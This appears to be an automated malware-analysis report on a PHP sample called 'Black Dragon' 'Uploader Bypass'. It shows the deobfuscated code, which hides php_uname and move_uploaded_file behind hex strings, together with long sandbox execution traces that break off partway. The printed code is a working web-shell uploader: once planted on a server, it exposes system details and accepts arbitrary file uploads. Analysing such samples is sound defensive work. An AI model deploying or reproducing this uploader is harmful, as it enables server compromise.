PHP Malware Analysis
up.pHp, up.php.txt
md5: 379ec3f70546fc81d4a56a6c620f32ce
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- bootstrap@5.1.3 (Deobfuscated, HTML, Original)
Environment
- php_uname (Traces)
Input
- _FILES (Deobfuscated, Original)
Title
URLs
- https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css (Deobfuscated, HTML, Original)
- https://fonts.googleapis.com/css?family=Lobster (Deobfuscated, HTML, Original)
- https://pro.fontawesome.com/releases/v5.10.0/css/all.css (Deobfuscated, HTML, Original)
Deobfuscated PHP code
<?php
/**
* Uploader Bypass
**/
$main = ["55706C6F61646572", "426C61636B20447261676F6E", "7068705F756E616D65", "6D6F76655F75706C6F616465645F66696C65"];
for ($i = 0; $i < count($main); $i++) {
$bd[$i] = uh($main[$i]);
}
function uh($hex)
{
$string = '';
for ($i = 0; $i < strlen($hex) - 1; $i += 2) {
$string .= chr(hexdec($hex[$i] . $hex[$i + 1]));
}
return $string;
}
?>
<html>
<head>
<meta charset="utf-8">
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous">
<link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p" crossorigin="anonymous"/>
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Lobster">
<title><?php
echo $bd[0];
?></title>
<style>
h1{
font-family: Lobster;
}
</style>
</head>
<body>
<div class="container">
<br><br><br><br><br>
<table width="100%">
<td>
<center>
<h1><?php
echo $bd[1];
?></h1>
<?php
echo $bd[2]();
?>
</center>
<br>
<div class="d-flex justify-content-center align-items-center">
<form method="post" enctype="multipart/form-data">
<div class="row">
<div class="col-md-9 mb-3">
<input type="file" class="form-control form-control-sm" name="uploadfile[]" multiple aria-label="Upload">
</div>
<div class="col-md-3">
<button type="submit" class="btn btn-primary btn-sm">Submit</button>
</div>
</div>
</form>
</div>
<?php
if (isset($_FILES['uploadfile'])) {
$total = count($_FILES['uploadfile']['name']);
for ($i = 0; $i < $total; $i++) {
$mainupload = $bd[3]($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);
}
if ($total < 2) {
if ($mainupload) {
echo "<center><div class='col-md-3'><div class='alert alert-success' role='alert'>Upload File Successfully!</div></div></center>";
} else {
echo "<center><div class='col-md-3'><div class='alert alert-danger' role='alert'>Upload File Failed</div></div></center>";
}
} else {
if ($mainupload) {
echo "<center><div class='col-md-3'><div class='alert alert-success' role='alert'>Upload {$i} Files Successfully!</div></div></center>";
} else {
echo "<center><div class='col-md-3'><div class='alert alert-danger' role='alert'>Upload File Failed</div></div></center>";
}
}
}
?>
</td>
</table>
</div>
</body>
<html>Execution traces
data/traces/379ec3f70546fc81d4a56a6c620f32ce_trace-1676237633.7092.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:34:19.607059]
1 0 1 0.000141 393464
1 3 0 0.000248 403872 {main} 1 /var/www/html/uploads/up.pHp 0 0
1 A /var/www/html/uploads/up.pHp 8 $main = [0 => '55706C6F61646572', 1 => '426C61636B20447261676F6E', 2 => '7068705F756E616D65', 3 => '6D6F76655F75706C6F616465645F66696C65']
1 A /var/www/html/uploads/up.pHp 14 $i = 0
2 4 0 0.000298 403872 uh 1 /var/www/html/uploads/up.pHp 15 1 '55706C6F61646572'
2 A /var/www/html/uploads/up.pHp 19 $string = ''
2 A /var/www/html/uploads/up.pHp 20 $i = 0
3 5 0 0.000333 403904 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '55'
3 5 1 0.000345 403952
3 5 R 85
3 6 0 0.000358 403872 chr 0 /var/www/html/uploads/up.pHp 21 1 85
3 6 1 0.000369 403912
3 6 R 'U'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'U'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 7 0 0.000403 403936 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '70'
3 7 1 0.000415 403984
3 7 R 112
3 8 0 0.000427 403904 chr 0 /var/www/html/uploads/up.pHp 21 1 112
3 8 1 0.000438 403944
3 8 R 'p'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'p'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 9 0 0.000469 403936 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '6C'
3 9 1 0.000480 403984
3 9 R 108
3 10 0 0.000492 403904 chr 0 /var/www/html/uploads/up.pHp 21 1 108
3 10 1 0.000502 403944
3 10 R 'l'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'l'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 11 0 0.000533 403936 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '6F'
3 11 1 0.000544 403984
3 11 R 111
3 12 0 0.000557 403904 chr 0 /var/www/html/uploads/up.pHp 21 1 111
3 12 1 0.000568 403944
3 12 R 'o'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'o'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 13 0 0.000598 403936 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '61'
3 13 1 0.000609 403984
3 13 R 97
3 14 0 0.000621 403904 chr 0 /var/www/html/uploads/up.pHp 21 1 97
3 14 1 0.000631 403944
3 14 R 'a'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'a'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 15 0 0.000661 403936 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '64'
3 15 1 0.000672 403984
3 15 R 100
3 16 0 0.000684 403904 chr 0 /var/www/html/uploads/up.pHp 21 1 100
3 16 1 0.000694 403944
3 16 R 'd'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'd'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 17 0 0.000724 403936 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '65'
3 17 1 0.000735 403984
3 17 R 101
3 18 0 0.000747 403904 chr 0 /var/www/html/uploads/up.pHp 21 1 101
3 18 1 0.000757 403944
3 18 R 'e'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'e'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 19 0 0.000790 403936 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '72'
3 19 1 0.000801 403984
3 19 R 114
3 20 0 0.000845 403904 chr 0 /var/www/html/uploads/up.pHp 21 1 114
3 20 1 0.000856 403944
3 20 R 'r'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'r'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
2 4 1 0.000887 403912
2 4 R 'Uploader'
1 A /var/www/html/uploads/up.pHp 15 $bd[0] = 'Uploader'
1 A /var/www/html/uploads/up.pHp 14 $i++
2 21 0 0.000922 404288 uh 1 /var/www/html/uploads/up.pHp 15 1 '426C61636B20447261676F6E'
2 A /var/www/html/uploads/up.pHp 19 $string = ''
2 A /var/www/html/uploads/up.pHp 20 $i = 0
3 22 0 0.000954 404320 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '42'
3 22 1 0.000965 404368
3 22 R 66
3 23 0 0.000977 404288 chr 0 /var/www/html/uploads/up.pHp 21 1 66
3 23 1 0.000988 404328
3 23 R 'B'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'B'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 24 0 0.001018 404352 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '6C'
3 24 1 0.001035 404400
3 24 R 108
3 25 0 0.001047 404320 chr 0 /var/www/html/uploads/up.pHp 21 1 108
3 25 1 0.001058 404360
3 25 R 'l'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'l'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 26 0 0.001088 404352 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '61'
3 26 1 0.001099 404400
3 26 R 97
3 27 0 0.001111 404320 chr 0 /var/www/html/uploads/up.pHp 21 1 97
3 27 1 0.001122 404360
3 27 R 'a'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'a'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 28 0 0.001151 404352 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '63'
3 28 1 0.001162 404400
3 28 R 99
3 29 0 0.001174 404320 chr 0 /var/www/html/uploads/up.pHp 21 1 99
3 29 1 0.001184 404360
3 29 R 'c'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'c'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 30 0 0.001213 404352 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '6B'
3 30 1 0.001224 404400
3 30 R 107
3 31 0 0.001236 404320 chr 0 /var/www/html/uploads/up.pHp 21 1 107
3 31 1 0.001247 404360
3 31 R 'k'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'k'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 32 0 0.001276 404352 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '20'
3 32 1 0.001286 404400
3 32 R 32
3 33 0 0.001298 404320 chr 0 /var/www/html/uploads/up.pHp 21 1 32
3 33 1 0.001308 404360
3 33 R ' '
2 A /var/www/html/uploads/up.pHp 21 $string .= ' '
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 34 0 0.001338 404352 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '44'
3 34 1 0.001348 404400
3 34 R 68
3 35 0 0.001360 404320 chr 0 /var/www/html/uploads/up.pHp 21 1 68
3 35 1 0.001370 404360
3 35 R 'D'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'D'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 36 0 0.001399 404352 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '72'
3 36 1 0.001410 404400
3 36 R 114
3 37 0 0.001422 404320 chr 0 /var/www/html/uploads/up.pHp 21 1 114
3 37 1 0.001432 404360
3 37 R 'r'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'r'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 38 0 0.001461 404360 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '61'
3 38 1 0.001471 404408
3 38 R 97
3 39 0 0.001483 404328 chr 0 /var/www/html/uploads/up.pHp 21 1 97
3 39 1 0.001493 404368
3 39 R 'a'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'a'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 40 0 0.001522 404360 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '67'
3 40 1 0.001533 404408
3 40 R 103
3 41 0 0.001545 404328 chr 0 /var/www/html/uploads/up.pHp 21 1 103
3 41 1 0.001556 404368
3 41 R 'g'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'g'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 42 0 0.001585 404360 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '6F'
3 42 1 0.001596 404408
3 42 R 111
3 43 0 0.001608 404328 chr 0 /var/www/html/uploads/up.pHp 21 1 111
3 43 1 0.001618 404368
3 43 R 'o'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'o'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 44 0 0.001647 404360 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '6E'
3 44 1 0.001658 404408
3 44 R 110
3 45 0 0.001670 404328 chr 0 /var/www/html/uploads/up.pHp 21 1 110
3 45 1 0.001680 404368
3 45 R 'n'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'n'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
2 21 1 0.001710 404328
2 21 R 'Black Dragon'
1 A /var/www/html/uploads/up.pHp 15 $bd[1] = 'Black Dragon'
1 A /var/www/html/uploads/up.pHp 14 $i++
2 46 0 0.001743 404328 uh 1 /var/www/html/uploads/up.pHp 15 1 '7068705F756E616D65'
2 A /var/www/html/uploads/up.pHp 19 $string = ''
2 A /var/www/html/uploads/up.pHp 20 $i = 0
3 47 0 0.001779 404360 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '70'
3 47 1 0.001790 404408
3 47 R 112
3 48 0 0.001802 404328 chr 0 /var/www/html/uploads/up.pHp 21 1 112
3 48 1 0.001812 404368
3 48 R 'p'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'p'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 49 0 0.001842 404392 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '68'
3 49 1 0.001853 404440
3 49 R 104
3 50 0 0.001865 404360 chr 0 /var/www/html/uploads/up.pHp 21 1 104
3 50 1 0.001876 404400
3 50 R 'h'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'h'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 51 0 0.001905 404392 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '70'
3 51 1 0.001916 404440
3 51 R 112
3 52 0 0.001928 404360 chr 0 /var/www/html/uploads/up.pHp 21 1 112
3 52 1 0.001938 404400
3 52 R 'p'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'p'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 53 0 0.001967 404392 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '5F'
3 53 1 0.001978 404440
3 53 R 95
3 54 0 0.001990 404360 chr 0 /var/www/html/uploads/up.pHp 21 1 95
3 54 1 0.002001 404400
3 54 R '_'
2 A /var/www/html/uploads/up.pHp 21 $string .= '_'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 55 0 0.002030 404392 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '75'
3 55 1 0.002041 404440
3 55 R 117
3 56 0 0.002052 404360 chr 0 /var/www/html/uploads/up.pHp 21 1 117
3 56 1 0.002063 404400
3 56 R 'u'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'u'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 57 0 0.002092 404392 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '6E'
3 57 1 0.002103 404440
3 57 R 110
3 58 0 0.002114 404360 chr 0 /var/www/html/uploads/up.pHp 21 1 110
3 58 1 0.002125 404400
3 58 R 'n'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'n'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 59 0 0.002154 404392 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '61'
3 59 1 0.002164 404440
3 59 R 97
3 60 0 0.002176 404360 chr 0 /var/www/html/uploads/up.pHp 21 1 97
3 60 1 0.002187 404400
3 60 R 'a'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'a'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 61 0 0.002216 404392 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '6D'
3 61 1 0.002226 404440
3 61 R 109
3 62 0 0.002238 404360 chr 0 /var/www/html/uploads/up.pHp 21 1 109
3 62 1 0.002249 404400
3 62 R 'm'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'm'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 63 0 0.002277 404400 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '65'
3 63 1 0.002288 404448
3 63 R 101
3 64 0 0.002300 404368 chr 0 /var/www/html/uploads/up.pHp 21 1 101
3 64 1 0.002310 404408
3 64 R 'e'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'e'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
2 46 1 0.002339 404368
2 46 R 'php_uname'
1 A /var/www/html/uploads/up.pHp 15 $bd[2] = 'php_uname'
1 A /var/www/html/uploads/up.pHp 14 $i++
2 65 0 0.002372 404368 uh 1 /var/www/html/uploads/up.pHp 15 1 '6D6F76655F75706C6F616465645F66696C65'
2 A /var/www/html/uploads/up.pHp 19 $string = ''
2 A /var/www/html/uploads/up.pHp 20 $i = 0
3 66 0 0.002404 404400 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '6D'
3 66 1 0.002416 404448
3 66 R 109
3 67 0 0.002427 404368 chr 0 /var/www/html/uploads/up.pHp 21 1 109
3 67 1 0.002438 404408
3 67 R 'm'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'm'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 68 0 0.002467 404432 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '6F'
3 68 1 0.002478 404480
3 68 R 111
3 69 0 0.002490 404400 chr 0 /var/www/html/uploads/up.pHp 21 1 111
3 69 1 0.002503 404440
3 69 R 'o'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'o'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 70 0 0.002533 404432 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '76'
3 70 1 0.002544 404480
3 70 R 118
3 71 0 0.002556 404400 chr 0 /var/www/html/uploads/up.pHp 21 1 118
3 71 1 0.002566 404440
3 71 R 'v'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'v'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 72 0 0.002595 404432 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '65'
3 72 1 0.002606 404480
3 72 R 101
3 73 0 0.002618 404400 chr 0 /var/www/html/uploads/up.pHp 21 1 101
3 73 1 0.002628 404440
3 73 R 'e'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'e'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 74 0 0.002657 404432 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '5F'
3 74 1 0.002668 404480
3 74 R 95
3 75 0 0.002680 404400 chr 0 /var/www/html/uploads/up.pHp 21 1 95
3 75 1 0.002690 404440
3 75 R '_'
2 A /var/www/html/uploads/up.pHp 21 $string .= '_'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 76 0 0.002719 404432 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '75'
3 76 1 0.002730 404480
3 76 R 117
3 77 0 0.002741 404400 chr 0 /var/www/html/uploads/up.pHp 21 1 117
3 77 1 0.002752 404440
3 77 R 'u'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'u'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 78 0 0.002780 404432 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '70'
3 78 1 0.002791 404480
3 78 R 112
3 79 0 0.002803 404400 chr 0 /var/www/html/uploads/up.pHp 21 1 112
3 79 1 0.002813 404440
3 79 R 'p'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'p'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 80 0 0.002842 404432 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '6C'
3 80 1 0.002853 404480
3 80 R 108
3 81 0 0.002865 404400 chr 0 /var/www/html/uploads/up.pHp 21 1 108
3 81 1 0.002875 404440
3 81 R 'l'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'l'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 82 0 0.002904 404440 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '6F'
3 82 1 0.002914 404488
3 82 R 111
3 83 0 0.002926 404408 chr 0 /var/www/html/uploads/up.pHp 21 1 111
3 83 1 0.002936 404448
3 83 R 'o'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'o'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 84 0 0.002965 404440 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '61'
3 84 1 0.002976 404488
3 84 R 97
3 85 0 0.002987 404408 chr 0 /var/www/html/uploads/up.pHp 21 1 97
3 85 1 0.002998 404448
3 85 R 'a'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'a'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 86 0 0.003032 404440 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '64'
3 86 1 0.003043 404488
3 86 R 100
3 87 0 0.003054 404408 chr 0 /var/www/html/uploads/up.pHp 21 1 100
3 87 1 0.003065 404448
3 87 R 'd'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'd'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 88 0 0.003093 404440 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '65'
3 88 1 0.003104 404488
3 88 R 101
3 89 0 0.003116 404408 chr 0 /var/www/html/uploads/up.pHp 21 1 101
3 89 1 0.003126 404448
3 89 R 'e'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'e'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 90 0 0.003155 404440 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '64'
3 90 1 0.003166 404488
3 90 R 100
3 91 0 0.003178 404408 chr 0 /var/www/html/uploads/up.pHp 21 1 100
3 91 1 0.003188 404448
3 91 R 'd'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'd'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 92 0 0.003216 404440 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '5F'
3 92 1 0.003231 404488
3 92 R 95
3 93 0 0.003243 404408 chr 0 /var/www/html/uploads/up.pHp 21 1 95
3 93 1 0.003253 404448
3 93 R '_'
2 A /var/www/html/uploads/up.pHp 21 $string .= '_'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 94 0 0.003282 404440 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '66'
3 94 1 0.003293 404488
3 94 R 102
3 95 0 0.003305 404408 chr 0 /var/www/html/uploads/up.pHp 21 1 102
3 95 1 0.003315 404448
3 95 R 'f'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'f'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 96 0 0.003343 404440 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '69'
3 96 1 0.003354 404488
3 96 R 105
3 97 0 0.003366 404408 chr 0 /var/www/html/uploads/up.pHp 21 1 105
3 97 1 0.003376 404448
3 97 R 'i'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'i'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 98 0 0.003405 404448 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '6C'
3 98 1 0.003416 404496
3 98 R 108
3 99 0 0.003428 404416 chr 0 /var/www/html/uploads/up.pHp 21 1 108
3 99 1 0.003438 404456
3 99 R 'l'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'l'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
3 100 0 0.003466 404448 hexdec 0 /var/www/html/uploads/up.pHp 21 1 '65'
3 100 1 0.003477 404496
3 100 R 101
3 101 0 0.003490 404416 chr 0 /var/www/html/uploads/up.pHp 21 1 101
3 101 1 0.003500 404456
3 101 R 'e'
2 A /var/www/html/uploads/up.pHp 21 $string .= 'e'
2 A /var/www/html/uploads/up.pHp 20 $i += 2
2 65 1 0.003529 404416
2 65 R 'move_uploaded_file'
1 A /var/www/html/uploads/up.pHp 15 $bd[3] = 'move_uploaded_file'
1 A /var/www/html/uploads/up.pHp 14 $i++
2 102 0 0.003566 404416 php_uname 0 /var/www/html/uploads/up.pHp 46 0
2 102 1 0.003579 404528
2 102 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1 3 1 0.003598 404416
0.003624 317136
TRACE END [2023-02-12 19:34:19.610569]
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:22:44.137585]
1 0 1 0.000153 393528
1 3 0 0.000260 403944 {main} 1 /var/www/html/uploads/up.php.txt 0 0
1 A /var/www/html/uploads/up.php.txt 8 $main = [0 => '55706C6F61646572', 1 => '426C61636B20447261676F6E', 2 => '7068705F756E616D65', 3 => '6D6F76655F75706C6F616465645F66696C65']
1 A /var/www/html/uploads/up.php.txt 14 $i = 0
2 4 0 0.000311 403944 uh 1 /var/www/html/uploads/up.php.txt 15 1 '55706C6F61646572'
2 A /var/www/html/uploads/up.php.txt 19 $string = ''
2 A /var/www/html/uploads/up.php.txt 20 $i = 0
3 5 0 0.000347 403976 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '55'
3 5 1 0.000360 404024
3 5 R 85
3 6 0 0.000373 403944 chr 0 /var/www/html/uploads/up.php.txt 21 1 85
3 6 1 0.000385 403984
3 6 R 'U'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'U'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 7 0 0.000420 404008 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '70'
3 7 1 0.000432 404056
3 7 R 112
3 8 0 0.000445 403976 chr 0 /var/www/html/uploads/up.php.txt 21 1 112
3 8 1 0.000456 404016
3 8 R 'p'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'p'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 9 0 0.000488 404008 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '6C'
3 9 1 0.000500 404056
3 9 R 108
3 10 0 0.000512 403976 chr 0 /var/www/html/uploads/up.php.txt 21 1 108
3 10 1 0.000523 404016
3 10 R 'l'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'l'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 11 0 0.000554 404008 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '6F'
3 11 1 0.000566 404056
3 11 R 111
3 12 0 0.000579 403976 chr 0 /var/www/html/uploads/up.php.txt 21 1 111
3 12 1 0.000591 404016
3 12 R 'o'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'o'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 13 0 0.000633 404008 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '61'
3 13 1 0.000645 404056
3 13 R 97
3 14 0 0.000657 403976 chr 0 /var/www/html/uploads/up.php.txt 21 1 97
3 14 1 0.000669 404016
3 14 R 'a'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'a'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 15 0 0.000699 404008 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '64'
3 15 1 0.000711 404056
3 15 R 100
3 16 0 0.000723 403976 chr 0 /var/www/html/uploads/up.php.txt 21 1 100
3 16 1 0.000735 404016
3 16 R 'd'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'd'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 17 0 0.000765 404008 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '65'
3 17 1 0.000777 404056
3 17 R 101
3 18 0 0.000789 403976 chr 0 /var/www/html/uploads/up.php.txt 21 1 101
3 18 1 0.000800 404016
3 18 R 'e'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'e'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 19 0 0.000830 404008 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '72'
3 19 1 0.000842 404056
3 19 R 114
3 20 0 0.000855 403976 chr 0 /var/www/html/uploads/up.php.txt 21 1 114
3 20 1 0.000866 404016
3 20 R 'r'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'r'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
2 4 1 0.000896 403984
2 4 R 'Uploader'
1 A /var/www/html/uploads/up.php.txt 15 $bd[0] = 'Uploader'
1 A /var/www/html/uploads/up.php.txt 14 $i++
2 21 0 0.000931 404360 uh 1 /var/www/html/uploads/up.php.txt 15 1 '426C61636B20447261676F6E'
2 A /var/www/html/uploads/up.php.txt 19 $string = ''
2 A /var/www/html/uploads/up.php.txt 20 $i = 0
3 22 0 0.000974 404392 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '42'
3 22 1 0.000986 404440
3 22 R 66
3 23 0 0.000999 404360 chr 0 /var/www/html/uploads/up.php.txt 21 1 66
3 23 1 0.001010 404400
3 23 R 'B'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'B'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 24 0 0.001047 404424 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '6C'
3 24 1 0.001058 404472
3 24 R 108
3 25 0 0.001071 404392 chr 0 /var/www/html/uploads/up.php.txt 21 1 108
3 25 1 0.001082 404432
3 25 R 'l'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'l'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 26 0 0.001112 404424 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '61'
3 26 1 0.001124 404472
3 26 R 97
3 27 0 0.001135 404392 chr 0 /var/www/html/uploads/up.php.txt 21 1 97
3 27 1 0.001147 404432
3 27 R 'a'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'a'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 28 0 0.001177 404424 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '63'
3 28 1 0.001188 404472
3 28 R 99
3 29 0 0.001200 404392 chr 0 /var/www/html/uploads/up.php.txt 21 1 99
3 29 1 0.001211 404432
3 29 R 'c'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'c'
2 A /var/www/html/uploads/up.php.txt 20 $i += 2
3 30 0 0.001242 404424 hexdec 0 /var/www/html/uploads/up.php.txt 21 1 '6B'
3 30 1 0.001253 404472
3 30 R 107
3 31 0 0.001265 404392 chr 0 /var/www/html/uploads/up.php.txt 21 1 107
3 31 1 0.001276 404432
3 31 R 'k'
2 A /var/www/html/uploads/up.php.txt 21 $string .= 'k'
